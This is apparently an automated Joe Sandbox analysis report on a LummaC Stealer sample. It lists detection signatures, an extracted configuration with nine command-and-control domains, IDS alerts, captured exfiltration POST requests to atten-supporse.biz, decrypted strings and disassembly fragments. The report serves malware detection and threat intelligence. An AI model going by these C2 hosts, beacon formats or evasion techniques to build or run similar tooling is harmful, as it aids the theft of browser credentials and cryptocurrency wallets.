Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571961
MD5:52f0f216dfbb86683b1e318a0796dd81
SHA1:2e2b8710e0a077ed8a2124fde2486f397857b8f6
SHA256:1d95373c2284b657b614f07051eed5fed72f34f787350409e49e8dc30a5ea494
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2876 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 52F0F216DFBB86683B1E318A0796DD81)
  • cleanup
{"C2 url": ["impend-differ.biz", "dwell-exclaim.biz", "se-blurry.biz", "atten-supporse.biz", "dare-curbys.biz", "zinc-sneark.biz", "formy-spill.biz", "covery-mover.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2183284410.000000000173F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2155738862.0000000001745000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2184825039.000000000173F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2183365042.000000000173F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 21 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:00.868997+010020283713Unknown Traffic192.168.2.549704104.21.48.1443TCP
                2024-12-09T22:35:03.184197+010020283713Unknown Traffic192.168.2.549705104.21.48.1443TCP
                2024-12-09T22:35:06.084485+010020283713Unknown Traffic192.168.2.549706104.21.48.1443TCP
                2024-12-09T22:35:09.573683+010020283713Unknown Traffic192.168.2.549707104.21.48.1443TCP
                2024-12-09T22:35:13.269460+010020283713Unknown Traffic192.168.2.549708104.21.48.1443TCP
                2024-12-09T22:35:16.110444+010020283713Unknown Traffic192.168.2.549709104.21.48.1443TCP
                2024-12-09T22:35:18.974676+010020283713Unknown Traffic192.168.2.549713104.21.48.1443TCP
                2024-12-09T22:35:23.317538+010020283713Unknown Traffic192.168.2.549722104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:01.920542+010020546531A Network Trojan was detected192.168.2.549704104.21.48.1443TCP
                2024-12-09T22:35:04.551032+010020546531A Network Trojan was detected192.168.2.549705104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:01.920542+010020498361A Network Trojan was detected192.168.2.549704104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:04.551032+010020498121A Network Trojan was detected192.168.2.549705104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:00.868997+010020579221Domain Observed Used for C2 Detected192.168.2.549704104.21.48.1443TCP
                2024-12-09T22:35:03.184197+010020579221Domain Observed Used for C2 Detected192.168.2.549705104.21.48.1443TCP
                2024-12-09T22:35:06.084485+010020579221Domain Observed Used for C2 Detected192.168.2.549706104.21.48.1443TCP
                2024-12-09T22:35:09.573683+010020579221Domain Observed Used for C2 Detected192.168.2.549707104.21.48.1443TCP
                2024-12-09T22:35:13.269460+010020579221Domain Observed Used for C2 Detected192.168.2.549708104.21.48.1443TCP
                2024-12-09T22:35:16.110444+010020579221Domain Observed Used for C2 Detected192.168.2.549709104.21.48.1443TCP
                2024-12-09T22:35:18.974676+010020579221Domain Observed Used for C2 Detected192.168.2.549713104.21.48.1443TCP
                2024-12-09T22:35:23.317538+010020579221Domain Observed Used for C2 Detected192.168.2.549722104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:34:59.339141+010020579211Domain Observed Used for C2 Detected192.168.2.5641601.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:08.226993+010020480941Malware Command and Control Activity Detected192.168.2.549706104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T22:35:18.986057+010028438641A Network Trojan was detected192.168.2.549713104.21.48.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: https://atten-supporse.biz:443/api://%ProgramFiles%Avira URL Cloud: Label: malware
                Source: https://atten-supporse.biz/744-1-2Avira URL Cloud: Label: malware
                Source: https://atten-supporse.biz/api1Avira URL Cloud: Label: malware
                Source: https://atten-supporse.biz:443/apiUU2Avira URL Cloud: Label: malware
                Source: file.exe.2876.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["impend-differ.biz", "dwell-exclaim.biz", "se-blurry.biz", "atten-supporse.biz", "dare-curbys.biz", "zinc-sneark.biz", "formy-spill.biz", "covery-mover.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}
                Source: file.exeReversingLabs: Detection: 39%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: impend-differ.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: print-vexer.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: dare-curbys.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: covery-mover.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: formy-spill.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: dwell-exclaim.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: zinc-sneark.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: se-blurry.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: atten-supporse.biz
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C66B7E CryptUnprotectData,0_2_00C66B7E
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]0_2_00C76170
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_00C5C36E
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]0_2_00C7C6D7
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00C7C6D7
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]0_2_00C7C6D7
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]0_2_00C7C6D7
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh0_2_00C8E690
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]0_2_00C5A960
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_00C5CE55
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00C8DBD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00C59CC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh0_2_00C8DCF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00C67E82
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]0_2_00C7BFD3
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]0_2_00C7BFDA
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]0_2_00C75F7D
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00C7A060
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h0_2_00C5C274
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_00C72270
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00C845F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp al, 2Eh0_2_00C766E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00C786F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_00C7A630
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00C70717
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00C70717
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00C786F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00C8CAC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_00C7AAD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]0_2_00C52B70
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]0_2_00C86B20
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00C8CCE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00C8CD60
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00C66E97
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_00C66E97
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h0_2_00C6CEA5
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00C8CE00
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ebx, 03h0_2_00C78F5D
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h0_2_00C64F08
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, edx0_2_00C64F08
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00C6D087
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00C7D085
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00C7D085
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00C6D074
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00C67190
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]0_2_00C792D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ebx0_2_00C792D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [00C94284h]0_2_00C75230
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00C7B3DE
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00C7B3DE
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, bx0_2_00C7536C
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00C77307
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C7B4BB
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00C7B475
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00C57470
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00C57470
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]0_2_00C796D8
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]0_2_00C77653
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00C6597D
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]0_2_00C66E97
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_00C66E97
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, eax0_2_00C55910
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_00C55910
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_00C75920
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00C65ADC
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_00C69C10
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]0_2_00C65EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00C71EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h0_2_00C8DFB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]0_2_00C75F7D

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:64160 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49704 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49705 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49706 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49707 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49708 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49713 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49709 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49722 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49713 -> 104.21.48.1:443
                Source: Malware configuration extractorURLs: impend-differ.biz
                Source: Malware configuration extractorURLs: dwell-exclaim.biz
                Source: Malware configuration extractorURLs: se-blurry.biz
                Source: Malware configuration extractorURLs: atten-supporse.biz
                Source: Malware configuration extractorURLs: dare-curbys.biz
                Source: Malware configuration extractorURLs: zinc-sneark.biz
                Source: Malware configuration extractorURLs: formy-spill.biz
                Source: Malware configuration extractorURLs: covery-mover.biz
                Source: Malware configuration extractorURLs: print-vexer.biz
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.48.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NRG4EX5TSVGAGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: atten-supporse.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S3VQX4XMY4AUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15047Host: atten-supporse.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8H6WZ2K2HQ3C0EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20549Host: atten-supporse.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GRNSLLOILUIEJ2IWEALUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1262Host: atten-supporse.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NPJSDEQE47W6YAPLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570251Host: atten-supporse.biz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: file.exe, 00000000.00000003.2182636738.0000000005F7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183056768.0000000005F81000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268418527.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205721535.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155726723.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156002703.0000000005F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/744-1-2
